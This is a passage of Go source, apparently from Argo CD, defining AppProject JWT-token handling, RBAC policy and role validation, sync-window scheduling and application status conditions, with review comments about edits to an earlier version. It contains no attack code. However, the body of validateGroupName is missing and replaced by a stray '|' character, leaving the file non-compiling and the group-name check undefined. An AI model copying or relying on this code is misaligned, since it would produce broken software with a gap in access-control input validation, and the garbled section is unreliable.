				token := role.JWTTokens[i]
				return &token, i, nil
			}
		}
	}
	return nil, -1, fmt.Errorf("JWT token for role '%s' issued at '%d' does not exist in project '%s'", role.Name, issuedAt, p.Name)
}
// GetJWTToken looks up a JWTToken stored under the project status, first by id
// (new tokens) and then by issue time (old tokens). It returns the token, its
// index within the role's token list, or an error when it cannot be found.
func (p *AppProject) GetJWTToken(roleName string, issuedAt int64, id string) (*JWTToken, int, error) {
	// Newer versions store JWTTokens under status.jwtTokensByRole.
	tokens := p.Status.JWTTokensByRole[roleName].Items
	if id != "" {
		for i := range tokens {
			if tokens[i].ID == id {
				token := tokens[i]
				return &token, i, nil
			}
		}
	}
	if issuedAt != -1 {
		for i := range tokens {
			if tokens[i].IssuedAt == issuedAt {
				token := tokens[i]
				return &token, i, nil
			}
		}
	}
	return nil, -1, fmt.Errorf("JWT token for role '%s' issued at '%d' does not exist in project '%s'", roleName, issuedAt, p.Name)
}
// RemoveJWTToken removes the JWT token identified by issuedAt/id from the role
// at roleIndex, deleting it both from the legacy location
// (spec.roles[].jwtTokens) and the current location (status.jwtTokensByRole).
// It returns nil when the token was found in at least one of the two places.
//
// NOTE(review): the receiver is by value, unlike the pointer receivers on the
// other AppProject methods. The mutations are still visible to the caller
// because they go through the shared backing array of Spec.Roles and the
// Status.JWTTokensByRole map — confirm before "fixing" the receiver.
func (p AppProject) RemoveJWTToken(roleIndex int, issuedAt int64, id string) error {
	roleName := p.Spec.Roles[roleIndex].Name
	// For backward compatibility
	_, jwtTokenIndex, err1 := p.GetJWTTokenFromSpec(roleName, issuedAt, id)
	if err1 == nil {
		// Swap-delete: move the last token into the removed slot, then shrink.
		p.Spec.Roles[roleIndex].JWTTokens[jwtTokenIndex] = p.Spec.Roles[roleIndex].JWTTokens[len(p.Spec.Roles[roleIndex].JWTTokens)-1]
		p.Spec.Roles[roleIndex].JWTTokens = p.Spec.Roles[roleIndex].JWTTokens[:len(p.Spec.Roles[roleIndex].JWTTokens)-1]
	}
	// New location for storing JWTToken
	_, jwtTokenIndex, err2 := p.GetJWTToken(roleName, issuedAt, id)
	if err2 == nil {
		// Same swap-delete on the status-side token list.
		p.Status.JWTTokensByRole[roleName].Items[jwtTokenIndex] = p.Status.JWTTokensByRole[roleName].Items[len(p.Status.JWTTokensByRole[roleName].Items)-1]
		p.Status.JWTTokensByRole[roleName] = JWTTokens{Items: p.Status.JWTTokensByRole[roleName].Items[:len(p.Status.JWTTokensByRole[roleName].Items)-1]}
	}
	if err1 == nil || err2 == nil {
		// If we found this token in either place, report success.
		return nil
	} else {
		// If we could not locate this token in either place, either error is
		// equally informative; return the status-side one.
		return err2
	}
}
// ValidateJWTTokenID checks that a proposed token id is not already used by a
// JWT token on the given role. An empty id is always accepted.
func (p *AppProject) ValidateJWTTokenID(roleName string, id string) error {
	role, _, err := p.GetRoleByName(roleName)
	if err != nil {
		return err
	}
	if id == "" {
		return nil
	}
	for i := range role.JWTTokens {
		if role.JWTTokens[i].ID == id {
			return status.Errorf(codes.InvalidArgument, "Token id '%s' has been used. ", id)
		}
	}
	return nil
}
// ValidateProject verifies that the project contains no duplicate destinations,
// source repos, roles, policies, groups or sync windows, and that role names,
// policies, groups and windows are individually valid.
func (p *AppProject) ValidateProject() error {
	destKeys := make(map[string]bool)
	for _, dest := range p.Spec.Destinations {
		// A destination is identified by the server/namespace pair.
		key := fmt.Sprintf("%s/%s", dest.Server, dest.Namespace)
		if _, ok := destKeys[key]; ok {
			return status.Errorf(codes.InvalidArgument, "destination '%s' already added", key)
		}
		destKeys[key] = true
	}
	srcRepos := make(map[string]bool)
	for _, src := range p.Spec.SourceRepos {
		if _, ok := srcRepos[src]; ok {
			return status.Errorf(codes.InvalidArgument, "source repository '%s' already added", src)
		}
		srcRepos[src] = true
	}
	roleNames := make(map[string]bool)
	for _, role := range p.Spec.Roles {
		if _, ok := roleNames[role.Name]; ok {
			return status.Errorf(codes.AlreadyExists, "role '%s' already exists", role.Name)
		}
		if err := validateRoleName(role.Name); err != nil {
			return err
		}
		// Policies must be unique per role and individually well-formed.
		existingPolicies := make(map[string]bool)
		for _, policy := range role.Policies {
			if _, ok := existingPolicies[policy]; ok {
				return status.Errorf(codes.AlreadyExists, "policy '%s' already exists for role '%s'", policy, role.Name)
			}
			if err := validatePolicy(p.Name, role.Name, policy); err != nil {
				return err
			}
			existingPolicies[policy] = true
		}
		// OIDC groups must be unique per role and individually well-formed.
		existingGroups := make(map[string]bool)
		for _, group := range role.Groups {
			if _, ok := existingGroups[group]; ok {
				return status.Errorf(codes.AlreadyExists, "group '%s' already exists for role '%s'", group, role.Name)
			}
			if err := validateGroupName(group); err != nil {
				return err
			}
			existingGroups[group] = true
		}
		roleNames[role.Name] = true
	}
	if p.Spec.SyncWindows.HasWindows() {
		existingWindows := make(map[string]bool)
		for _, window := range p.Spec.SyncWindows {
			// Windows are deduplicated on the kind+schedule+duration triple.
			if _, ok := existingWindows[window.Kind+window.Schedule+window.Duration]; ok {
				return status.Errorf(codes.AlreadyExists, "window '%s':'%s':'%s' already exists, update or edit", window.Kind, window.Schedule, window.Duration)
			}
			err := window.Validate()
			if err != nil {
				return err
			}
			// Every window must be scoped to at least one target.
			if len(window.Applications) == 0 && len(window.Namespaces) == 0 && len(window.Clusters) == 0 {
				return status.Errorf(codes.OutOfRange, "window '%s':'%s':'%s' requires one of application, cluster or namespace", window.Kind, window.Schedule, window.Duration)
			}
			existingWindows[window.Kind+window.Schedule+window.Duration] = true
		}
	}
	return nil
}
// validActions enumerates the literal RBAC actions accepted in project policies.
// TODO: refactor to use rbacpolicy.ActionGet, rbacpolicy.ActionCreate, without import cycle
var validActions = map[string]bool{
	"get":      true,
	"create":   true,
	"update":   true,
	"delete":   true,
	"sync":     true,
	"override": true,
	"*":        true,
}

// validActionPatterns holds regular expressions for action names accepted in
// addition to the literal actions above.
var validActionPatterns = []*regexp.Regexp{
	regexp.MustCompile("action/.*"),
}

// isValidAction reports whether action is either one of the literal valid
// actions or matches one of the accepted action patterns.
func isValidAction(action string) bool {
	if validActions[action] {
		return true
	}
	for _, pattern := range validActionPatterns {
		if pattern.MatchString(action) {
			return true
		}
	}
	return false
}
// validatePolicy checks that a single casbin policy string attached to a
// project role is well formed: correct arity, the expected subject for this
// project/role pair, an 'applications' resource, a known action, an object
// scoped to the project, and an allow/deny effect.
func validatePolicy(proj string, role string, policy string) error {
	tokens := strings.Split(policy, ",")
	if len(tokens) != 6 || strings.Trim(tokens[0], " ") != "p" {
		return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': must be of the form: 'p, sub, res, act, obj, eft'", policy)
	}
	// subject
	subject := strings.Trim(tokens[1], " ")
	expectedSubject := fmt.Sprintf("proj:%s:%s", proj, role)
	if subject != expectedSubject {
		return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': policy subject must be: '%s', not '%s'", policy, expectedSubject, subject)
	}
	// resource
	if resource := strings.Trim(tokens[2], " "); resource != "applications" {
		return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': project resource must be: 'applications', not '%s'", policy, resource)
	}
	// action
	if action := strings.Trim(tokens[3], " "); !isValidAction(action) {
		return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': invalid action '%s'", policy, action)
	}
	// object: '<proj>/*' or '<proj>/<APPNAME>'
	object := strings.Trim(tokens[4], " ")
	objectRegexp, err := regexp.Compile(fmt.Sprintf(`^%s/[*\w-.]+$`, proj))
	if err != nil || !objectRegexp.MatchString(object) {
		return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': object must be of form '%s/*' or '%s/<APPNAME>', not '%s'", policy, proj, proj, object)
	}
	// effect
	if effect := strings.Trim(tokens[5], " "); effect != "allow" && effect != "deny" {
		return status.Errorf(codes.InvalidArgument, "invalid policy rule '%s': effect must be: 'allow' or 'deny'", policy)
	}
	return nil
}
// roleNameRegexp restricts role names to alphanumerics, '-' and '_', starting
// and ending with an alphanumeric character.
var roleNameRegexp = regexp.MustCompile(`^[a-zA-Z0-9]([-_a-zA-Z0-9]*[a-zA-Z0-9])?$`)

// validateRoleName returns an InvalidArgument error when name does not match
// roleNameRegexp, and nil otherwise.
func validateRoleName(name string) error {
	if roleNameRegexp.MatchString(name) {
		return nil
	}
	return status.Errorf(codes.InvalidArgument, "invalid role name '%s'. Must consist of alphanumeric characters, '-' or '_', and must start and end with an alphanumeric character", name)
}
var invalidChars = regexp.MustCompile("[,\n\r\t]")
func validateGroupName(name string) error |
// AddGroupToRole adds an OIDC group to a role. It reports true when the group
// was added and false when it was already present.
func (p *AppProject) AddGroupToRole(roleName, group string) (bool, error) {
	role, roleIndex, err := p.GetRoleByName(roleName)
	if err != nil {
		return false, err
	}
	for _, existing := range role.Groups {
		if existing == group {
			return false, nil
		}
	}
	role.Groups = append(role.Groups, group)
	// GetRoleByName returns a copy, so write the updated role back.
	p.Spec.Roles[roleIndex] = *role
	return true, nil
}
// RemoveGroupFromRole removes an OIDC group from a role. It reports true when
// a group was removed and false when the group was not bound to the role.
func (p *AppProject) RemoveGroupFromRole(roleName, group string) (bool, error) {
	role, roleIndex, err := p.GetRoleByName(roleName)
	if err != nil {
		return false, err
	}
	for i, existing := range role.Groups {
		if existing != group {
			continue
		}
		role.Groups = append(role.Groups[:i], role.Groups[i+1:]...)
		// GetRoleByName returns a copy, so write the updated role back.
		p.Spec.Roles[roleIndex] = *role
		return true, nil
	}
	return false, nil
}
// NormalizePolicies rewrites every role policy in the project into the
// canonical comma-separated form produced by normalizePolicy.
func (p *AppProject) NormalizePolicies() {
	for i := range p.Spec.Roles {
		// Keep a nil slice when a role has no policies (matches original
		// serialization behavior).
		var normalized []string
		for _, policy := range p.Spec.Roles[i].Policies {
			normalized = append(normalized, p.normalizePolicy(policy))
		}
		p.Spec.Roles[i].Policies = normalized
	}
}
// normalizePolicy reformats a comma-separated casbin policy so that each field
// after the first is separated by ", " with surrounding spaces trimmed.
// Fields are taken verbatim until the first non-empty one is accumulated,
// which also means leading empty fields are dropped (preserved quirk of the
// original implementation).
func (p *AppProject) normalizePolicy(policy string) string {
	result := ""
	for _, field := range strings.Split(policy, ",") {
		if result == "" {
			result = field
		} else {
			result = fmt.Sprintf("%s, %s", result, strings.Trim(field, " "))
		}
	}
	return result
}
// OrphanedResourcesMonitorSettings holds settings of orphaned resources monitoring
type OrphanedResourcesMonitorSettings struct {
	// Warn indicates if warning condition should be created for apps which have orphaned resources
	Warn *bool `json:"warn,omitempty" protobuf:"bytes,1,name=warn"`
	// Ignore lists resources that are excluded from orphaned-resource checks
	Ignore []OrphanedResourceKey `json:"ignore,omitempty" protobuf:"bytes,2,opt,name=ignore"`
}

// OrphanedResourceKey identifies a resource (by group/kind/name) to be ignored
// by orphaned resources monitoring
type OrphanedResourceKey struct {
	Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
	Kind string `json:"kind,omitempty" protobuf:"bytes,2,opt,name=kind"`
	Name string `json:"name,omitempty" protobuf:"bytes,3,opt,name=name"`
}
// IsWarn reports whether a warning condition should be raised for orphaned
// resources; the default (unset Warn) is true.
func (s *OrphanedResourcesMonitorSettings) IsWarn() bool {
	if s.Warn == nil {
		return true
	}
	return *s.Warn
}
// SignatureKey is the specification of a key required to verify commit signatures with
type SignatureKey struct {
	// The ID of the key in hexadecimal notation
	KeyID string `json:"keyID" protobuf:"bytes,1,name=keyID"`
}
// AppProjectSpec is the specification of an AppProject
type AppProjectSpec struct {
	// SourceRepos contains list of repository URLs which can be used for deployment
	SourceRepos []string `json:"sourceRepos,omitempty" protobuf:"bytes,1,name=sourceRepos"`
	// Destinations contains list of destinations available for deployment
	// NOTE(review): the protobuf field name is the singular "destination" —
	// presumably kept for wire compatibility; confirm before changing.
	Destinations []ApplicationDestination `json:"destinations,omitempty" protobuf:"bytes,2,name=destination"`
	// Description contains optional project description
	Description string `json:"description,omitempty" protobuf:"bytes,3,opt,name=description"`
	// Roles are user defined RBAC roles associated with this project
	Roles []ProjectRole `json:"roles,omitempty" protobuf:"bytes,4,rep,name=roles"`
	// ClusterResourceWhitelist contains list of whitelisted cluster level resources
	ClusterResourceWhitelist []metav1.GroupKind `json:"clusterResourceWhitelist,omitempty" protobuf:"bytes,5,opt,name=clusterResourceWhitelist"`
	// NamespaceResourceBlacklist contains list of blacklisted namespace level resources
	NamespaceResourceBlacklist []metav1.GroupKind `json:"namespaceResourceBlacklist,omitempty" protobuf:"bytes,6,opt,name=namespaceResourceBlacklist"`
	// OrphanedResources specifies if controller should monitor orphaned resources of apps in this project
	OrphanedResources *OrphanedResourcesMonitorSettings `json:"orphanedResources,omitempty" protobuf:"bytes,7,opt,name=orphanedResources"`
	// SyncWindows controls when syncs can be run for apps in this project
	SyncWindows SyncWindows `json:"syncWindows,omitempty" protobuf:"bytes,8,opt,name=syncWindows"`
	// NamespaceResourceWhitelist contains list of whitelisted namespace level resources
	NamespaceResourceWhitelist []metav1.GroupKind `json:"namespaceResourceWhitelist,omitempty" protobuf:"bytes,9,opt,name=namespaceResourceWhitelist"`
	// List of PGP key IDs that commits to be synced to must be signed with
	SignatureKeys []SignatureKey `json:"signatureKeys,omitempty" protobuf:"bytes,10,opt,name=signatureKeys"`
	// ClusterResourceBlacklist contains list of blacklisted cluster level resources
	ClusterResourceBlacklist []metav1.GroupKind `json:"clusterResourceBlacklist,omitempty" protobuf:"bytes,11,opt,name=clusterResourceBlacklist"`
}
// SyncWindows is a collection of sync windows in this project
type SyncWindows []*SyncWindow

// SyncWindow contains the kind, time, duration and attributes that are used to assign the syncWindows to apps
type SyncWindow struct {
	// Kind defines if the window allows or blocks syncs
	Kind string `json:"kind,omitempty" protobuf:"bytes,1,opt,name=kind"`
	// Schedule is the time the window will begin, specified in cron format
	Schedule string `json:"schedule,omitempty" protobuf:"bytes,2,opt,name=schedule"`
	// Duration is the amount of time the sync window will be open
	Duration string `json:"duration,omitempty" protobuf:"bytes,3,opt,name=duration"`
	// Applications contains a list of applications that the window will apply to
	Applications []string `json:"applications,omitempty" protobuf:"bytes,4,opt,name=applications"`
	// Namespaces contains a list of namespaces that the window will apply to
	Namespaces []string `json:"namespaces,omitempty" protobuf:"bytes,5,opt,name=namespaces"`
	// Clusters contains a list of clusters that the window will apply to
	Clusters []string `json:"clusters,omitempty" protobuf:"bytes,6,opt,name=clusters"`
	// ManualSync enables manual syncs when they would otherwise be blocked
	ManualSync bool `json:"manualSync,omitempty" protobuf:"bytes,7,opt,name=manualSync"`
}
// HasWindows reports whether the collection contains at least one sync window.
func (s *SyncWindows) HasWindows() bool {
	if s == nil {
		return false
	}
	return len(*s) > 0
}
// Active returns the sync windows that are open right now (see active).
func (s *SyncWindows) Active() *SyncWindows {
	return s.active(time.Now())
}
// active returns the subset of windows that are open at currentTime, or nil
// when none are. currentTime is normalized to UTC because schedules are
// interpreted in UTC.
func (s *SyncWindows) active(currentTime time.Time) *SyncWindows {
	// If SyncWindows.Active() is called outside of a UTC locale, it should be
	// first converted to UTC before we scan through the SyncWindows.
	currentTime = currentTime.In(time.UTC)
	if s.HasWindows() {
		var active SyncWindows
		specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
		for _, w := range *s {
			// Check the parse errors instead of discarding them: a failed
			// Parse yields a nil cron.Schedule and calling Next on it would
			// panic. Unparsable windows are treated as not active.
			schedule, sErr := specParser.Parse(w.Schedule)
			duration, dErr := time.ParseDuration(w.Duration)
			if sErr != nil || dErr != nil {
				continue
			}
			// The window is active when its most recent start (the next start
			// when looking back one full duration) has already passed.
			nextWindow := schedule.Next(currentTime.Add(-duration))
			if nextWindow.Before(currentTime) {
				active = append(active, w)
			}
		}
		if len(active) > 0 {
			return &active
		}
	}
	return nil
}
// InactiveAllows returns the allow windows that are currently closed (see inactiveAllows).
func (s *SyncWindows) InactiveAllows() *SyncWindows {
	return s.inactiveAllows(time.Now())
}
// inactiveAllows returns the allow windows that are closed at currentTime, or
// nil when there are none. currentTime is normalized to UTC because schedules
// are interpreted in UTC.
func (s *SyncWindows) inactiveAllows(currentTime time.Time) *SyncWindows {
	// If SyncWindows.InactiveAllows() is called outside of a UTC locale, it should be
	// first converted to UTC before we scan through the SyncWindows.
	currentTime = currentTime.In(time.UTC)
	if s.HasWindows() {
		var inactive SyncWindows
		specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
		for _, w := range *s {
			if w.Kind == "allow" {
				schedule, sErr := specParser.Parse(w.Schedule)
				duration, dErr := time.ParseDuration(w.Duration)
				// Guard BEFORE calling Next: the original computed
				// schedule.Next first and only then checked sErr, which
				// panics on the nil Schedule returned by a failed Parse.
				if sErr != nil || dErr != nil {
					continue
				}
				nextWindow := schedule.Next(currentTime.Add(-duration))
				if !nextWindow.Before(currentTime) {
					inactive = append(inactive, w)
				}
			}
		}
		if len(inactive) > 0 {
			return &inactive
		}
	}
	return nil
}
// AddWindow validates and appends a new sync window to the project spec.
// Kind, schedule and duration are required; app, ns and cl are optional
// scoping lists; ms enables manual sync for the window.
func (s *AppProjectSpec) AddWindow(knd string, sch string, dur string, app []string, ns []string, cl []string, ms bool) error {
	if knd == "" || sch == "" || dur == "" {
		return fmt.Errorf("cannot create window: require kind, schedule, duration and one or more of applications, namespaces and clusters")
	}
	window := &SyncWindow{
		Kind:       knd,
		Schedule:   sch,
		Duration:   dur,
		ManualSync: ms,
	}
	if len(app) > 0 {
		window.Applications = app
	}
	if len(ns) > 0 {
		window.Namespaces = ns
	}
	if len(cl) > 0 {
		window.Clusters = cl
	}
	if err := window.Validate(); err != nil {
		return err
	}
	s.SyncWindows = append(s.SyncWindows, window)
	return nil
}
// DeleteWindow removes the sync window at index id from the project's sync
// windows. It returns an error when no window exists at that index.
func (s *AppProjectSpec) DeleteWindow(id int) error {
	// The original scanned the slice for a matching index; a bounds check is
	// equivalent. The error text is unchanged ('%d' renders identically to
	// the former '%s' of strconv.Itoa(id)).
	if id < 0 || id >= len(s.SyncWindows) {
		return fmt.Errorf("window with id '%d' not found", id)
	}
	s.SyncWindows = append(s.SyncWindows[:id], s.SyncWindows[id+1:]...)
	return nil
}
// Matches returns the windows that apply to the given application, matched by
// application name, destination cluster, or destination namespace (each entry
// is a glob pattern). Returns nil when no window matches.
//
// NOTE(review): a window that matches on more than one of the three lists is
// appended once per matching list, so the result can contain the same window
// multiple times; downstream consumers only iterate, so the duplicates appear
// harmless — confirm before deduplicating.
func (w *SyncWindows) Matches(app *Application) *SyncWindows {
	if w.HasWindows() {
		var matchingWindows SyncWindows
		for _, w := range *w {
			if len(w.Applications) > 0 {
				for _, a := range w.Applications {
					if globMatch(a, app.Name) {
						matchingWindows = append(matchingWindows, w)
						break
					}
				}
			}
			if len(w.Clusters) > 0 {
				for _, c := range w.Clusters {
					if globMatch(c, app.Spec.Destination.Server) {
						matchingWindows = append(matchingWindows, w)
						break
					}
				}
			}
			if len(w.Namespaces) > 0 {
				for _, n := range w.Namespaces {
					if globMatch(n, app.Spec.Destination.Namespace) {
						matchingWindows = append(matchingWindows, w)
						break
					}
				}
			}
		}
		if len(matchingWindows) > 0 {
			return &matchingWindows
		}
	}
	return nil
}
// CanSync reports whether a sync is currently permitted by these windows.
// With no windows configured, syncs are always allowed. An active deny window
// blocks syncs unless the sync is manual and every active deny window permits
// manual sync. Without an active deny, an active allow window permits the
// sync; failing that, a manual sync is still permitted when some inactive
// allow window has ManualSync enabled.
func (w *SyncWindows) CanSync(isManual bool) bool {
	if !w.HasWindows() {
		return true
	}
	var allowActive, denyActive, manualEnabled bool
	active := w.Active()
	// manualEnabled here reflects the active deny windows (see hasDeny).
	denyActive, manualEnabled = active.hasDeny()
	allowActive = active.hasAllow()
	if !denyActive {
		if !allowActive {
			// No active allow window: manual syncs may still be allowed by an
			// inactive allow window that enables manual sync.
			if isManual && w.InactiveAllows().manualEnabled() {
				return true
			}
		} else {
			return true
		}
	} else {
		if isManual && manualEnabled {
			return true
		}
	}
	return false
}
// hasDeny reports whether the collection contains a deny window, and whether
// manual sync is enabled for denies. The second result is the logical AND of
// ManualSync across all deny windows: the first deny seeds it, and any later
// deny with ManualSync disabled turns it off again.
func (w *SyncWindows) hasDeny() (bool, bool) {
	if !w.HasWindows() {
		return false, false
	}
	var denyActive, manualEnabled bool
	for _, a := range *w {
		if a.Kind == "deny" {
			if !denyActive {
				// First deny window encountered seeds the manual flag.
				manualEnabled = a.ManualSync
			} else {
				if manualEnabled {
					// Any subsequent deny without ManualSync disables it.
					if !a.ManualSync {
						manualEnabled = a.ManualSync
					}
				}
			}
			denyActive = true
		}
	}
	return denyActive, manualEnabled
}
// hasAllow reports whether the collection contains at least one allow window.
func (w *SyncWindows) hasAllow() bool {
	if !w.HasWindows() {
		return false
	}
	for _, window := range *w {
		if window.Kind == "allow" {
			return true
		}
	}
	return false
}
// manualEnabled reports whether any window in the collection permits manual
// syncs.
func (w *SyncWindows) manualEnabled() bool {
	if !w.HasWindows() {
		return false
	}
	for _, window := range *w {
		if window.ManualSync {
			return true
		}
	}
	return false
}
// Active reports whether the window is open right now (see active).
func (w SyncWindow) Active() bool {
	return w.active(time.Now())
}
// active reports whether the window is open at currentTime. The time is
// normalized to UTC because schedules are interpreted in UTC. Windows whose
// schedule or duration cannot be parsed are reported as inactive.
func (w SyncWindow) active(currentTime time.Time) bool {
	// If SyncWindow.Active() is called outside of a UTC locale, it should be
	// first converted to UTC before search
	currentTime = currentTime.UTC()
	specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
	schedule, sErr := specParser.Parse(w.Schedule)
	duration, dErr := time.ParseDuration(w.Duration)
	// The original discarded both errors; a failed Parse returns a nil
	// cron.Schedule whose Next panics, so treat unparsable windows as inactive.
	if sErr != nil || dErr != nil {
		return false
	}
	// The window is active when its most recent start (looking back one full
	// duration) has already passed.
	nextWindow := schedule.Next(currentTime.Add(-duration))
	return nextWindow.Before(currentTime)
}
// Update overwrites the window's schedule, duration, applications, namespaces
// and clusters with any non-empty values provided. At least one value must be
// given.
func (w *SyncWindow) Update(s string, d string, a []string, n []string, c []string) error {
	if s == "" && d == "" && len(a) == 0 && len(n) == 0 && len(c) == 0 {
		return fmt.Errorf("cannot update: require one or more of schedule, duration, application, namespace, or cluster")
	}
	if s != "" {
		w.Schedule = s
	}
	if d != "" {
		w.Duration = d
	}
	if len(a) > 0 {
		w.Applications = a
	}
	if len(n) > 0 {
		w.Namespaces = n
	}
	if len(c) > 0 {
		w.Clusters = c
	}
	return nil
}
// Validate checks that the window kind is allow or deny, that its schedule
// parses as a 5-field cron expression, and that its duration parses as a Go
// duration string.
func (w *SyncWindow) Validate() error {
	if w.Kind != "allow" && w.Kind != "deny" {
		return fmt.Errorf("kind '%s' mismatch: can only be allow or deny", w.Kind)
	}
	specParser := cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
	if _, err := specParser.Parse(w.Schedule); err != nil {
		return fmt.Errorf("cannot parse schedule '%s': %s", w.Schedule, err)
	}
	if _, err := time.ParseDuration(w.Duration); err != nil {
		return fmt.Errorf("cannot parse duration '%s': %s", w.Duration, err)
	}
	return nil
}
// DestinationClusters returns the server URLs of all destinations configured
// for the project. (The loop variable no longer shadows the receiver.)
func (d AppProjectSpec) DestinationClusters() []string {
	servers := make([]string, 0, len(d.Destinations))
	for _, dest := range d.Destinations {
		servers = append(servers, dest.Server)
	}
	return servers
}
// ProjectRole represents a role that has access to a project
type ProjectRole struct {
	// Name is a name for this role
	Name string `json:"name" protobuf:"bytes,1,opt,name=name"`
	// Description is a description of the role
	Description string `json:"description,omitempty" protobuf:"bytes,2,opt,name=description"`
	// Policies Stores a list of casbin formated strings that define access policies for the role in the project
	Policies []string `json:"policies,omitempty" protobuf:"bytes,3,rep,name=policies"`
	// JWTTokens are a list of generated JWT tokens bound to this role
	JWTTokens []JWTToken `json:"jwtTokens,omitempty" protobuf:"bytes,4,rep,name=jwtTokens"`
	// Groups are a list of OIDC group claims bound to this role
	Groups []string `json:"groups,omitempty" protobuf:"bytes,5,rep,name=groups"`
}

// JWTToken holds the issuedAt and expiresAt values of a token
type JWTToken struct {
	// IssuedAt is the token issue time as a Unix timestamp (JWT "iat" claim)
	IssuedAt int64 `json:"iat" protobuf:"int64,1,opt,name=iat"`
	// ExpiresAt is the token expiry time as a Unix timestamp (JWT "exp" claim)
	ExpiresAt int64 `json:"exp,omitempty" protobuf:"int64,2,opt,name=exp"`
	// ID uniquely identifies the token (newer tokens only)
	ID string `json:"id,omitempty" protobuf:"bytes,3,opt,name=id"`
}

// Command holds binary path and arguments list
type Command struct {
	Command []string `json:"command,omitempty" protobuf:"bytes,1,name=command"`
	Args []string `json:"args,omitempty" protobuf:"bytes,2,rep,name=args"`
}

// ConfigManagementPlugin contains config management plugin configuration
type ConfigManagementPlugin struct {
	Name string `json:"name" protobuf:"bytes,1,name=name"`
	// Init is an optional command run before Generate
	Init *Command `json:"init,omitempty" protobuf:"bytes,2,name=init"`
	// Generate produces the manifests
	Generate Command `json:"generate" protobuf:"bytes,3,name=generate"`
}

// KustomizeOptions are options for kustomize to use when building manifests
// NOTE(review): these fields carry only protobuf tags, unlike the other
// structs here — presumably intentional (not serialized to JSON); confirm.
type KustomizeOptions struct {
	// BuildOptions is a string of build parameters to use when calling `kustomize build`
	BuildOptions string `protobuf:"bytes,1,opt,name=buildOptions"`
	// BinaryPath holds optional path to kustomize binary
	BinaryPath string `protobuf:"bytes,2,opt,name=binaryPath"`
}
// ProjectPoliciesString returns a casbin-formatted string of the project's
// policies for each role: an implicit project-get policy, the role's own
// policies, and one group binding line per OIDC group, joined by newlines.
func (proj *AppProject) ProjectPoliciesString() string {
	var policies []string
	for i := range proj.Spec.Roles {
		role := &proj.Spec.Roles[i]
		policies = append(policies, fmt.Sprintf("p, proj:%s:%s, projects, get, %s, allow", proj.ObjectMeta.Name, role.Name, proj.ObjectMeta.Name))
		policies = append(policies, role.Policies...)
		for _, groupName := range role.Groups {
			policies = append(policies, fmt.Sprintf("g, %s, proj:%s:%s", groupName, proj.ObjectMeta.Name, role.Name))
		}
	}
	return strings.Join(policies, "\n")
}
// CascadedDeletion indicates if resources finalizer is set and controller should delete app resources before deleting app
func (app *Application) CascadedDeletion() bool {
	return getFinalizerIndex(app.ObjectMeta, common.ResourcesFinalizerName) > -1
}
// IsRefreshRequested reports whether the refresh annotation is present on the
// application, returning the requested refresh type: hard when explicitly
// requested, normal otherwise.
func (app *Application) IsRefreshRequested() (RefreshType, bool) {
	annotations := app.GetAnnotations()
	if annotations == nil {
		return RefreshTypeNormal, false
	}
	typeStr, ok := annotations[common.AnnotationKeyRefresh]
	if !ok {
		return RefreshTypeNormal, false
	}
	if typeStr == string(RefreshTypeHard) {
		return RefreshTypeHard, true
	}
	return RefreshTypeNormal, true
}
// SetCascadedDeletion sets or remove resources finalizer
func (app *Application) SetCascadedDeletion(prune bool) {
	setFinalizer(&app.ObjectMeta, common.ResourcesFinalizerName, prune)
}
// Expired reports whether the status has never been reconciled, or whether the
// last reconciliation happened more than statusRefreshTimeout ago.
func (status *ApplicationStatus) Expired(statusRefreshTimeout time.Duration) bool {
	if status.ReconciledAt == nil {
		return true
	}
	return status.ReconciledAt.Add(statusRefreshTimeout).Before(time.Now().UTC())
}
// SetConditions updates the application status conditions for a subset of evaluated types.
// If the application has a pre-existing condition of a type that is not in the evaluated list,
// it will be preserved. If the application has a pre-existing condition of a type that
// is in the evaluated list, but not in the incoming conditions list, it will be removed.
func (status *ApplicationStatus) SetConditions(conditions []ApplicationCondition, evaluatedTypes map[ApplicationConditionType]bool) {
	appConditions := make([]ApplicationCondition, 0)
	now := metav1.Now()
	// Preserve conditions whose type was not evaluated this round, stamping a
	// transition time if they never had one.
	for i := 0; i < len(status.Conditions); i++ {
		condition := status.Conditions[i]
		if _, ok := evaluatedTypes[condition.Type]; !ok {
			if condition.LastTransitionTime == nil {
				condition.LastTransitionTime = &now
			}
			appConditions = append(appConditions, condition)
		}
	}
	// Merge the incoming conditions.
	for i := range conditions {
		condition := conditions[i]
		if condition.LastTransitionTime == nil {
			condition.LastTransitionTime = &now
		}
		eci := findConditionIndexByType(status.Conditions, condition.Type)
		if eci >= 0 && status.Conditions[eci].Message == condition.Message {
			// If we already have a condition of this type, only update the timestamp if something
			// has changed.
			appConditions = append(appConditions, status.Conditions[eci])
		} else {
			// Otherwise we use the new incoming condition with an updated timestamp:
			appConditions = append(appConditions, condition)
		}
	}
	// Sort for a deterministic condition order (type, then message, then time).
	sort.Slice(appConditions, func(i, j int) bool {
		left := appConditions[i]
		right := appConditions[j]
		return fmt.Sprintf("%s/%s/%v", left.Type, left.Message, left.LastTransitionTime) < fmt.Sprintf("%s/%s/%v", right.Type, right.Message, right.LastTransitionTime)
	})
	status.Conditions = appConditions
}
// findConditionIndexByType returns the index of the first condition of type t,
// or -1 when no such condition exists.
func findConditionIndexByType(conditions []ApplicationCondition, t ApplicationConditionType) int {
	for i, c := range conditions {
		if c.Type == t {
			return i
		}
	}
	return -1
}
// GetConditions returns the application conditions whose type is present in
// conditionTypes. (The previous comment named the function "GetErrorConditions",
// which does not match the actual identifier.)
func (status *ApplicationStatus) GetConditions(conditionTypes map[ApplicationConditionType]bool) []ApplicationCondition {
	result := make([]ApplicationCondition, 0)
	for i := range status.Conditions {
		condition := status.Conditions[i]
		if ok := conditionTypes[condition.Type]; ok {
			result = append(result, condition)
		}
	}
	return result
}
// IsError reports whether the condition denotes an error condition, i.e. its
// type name ends in "Error".
func (condition *ApplicationCondition) IsError() bool {
	const errorSuffix = "Error"
	return strings.HasSuffix(condition.Type, errorSuffix)
}
// Equals compares two instances of ApplicationSource and return true if instances are equal.
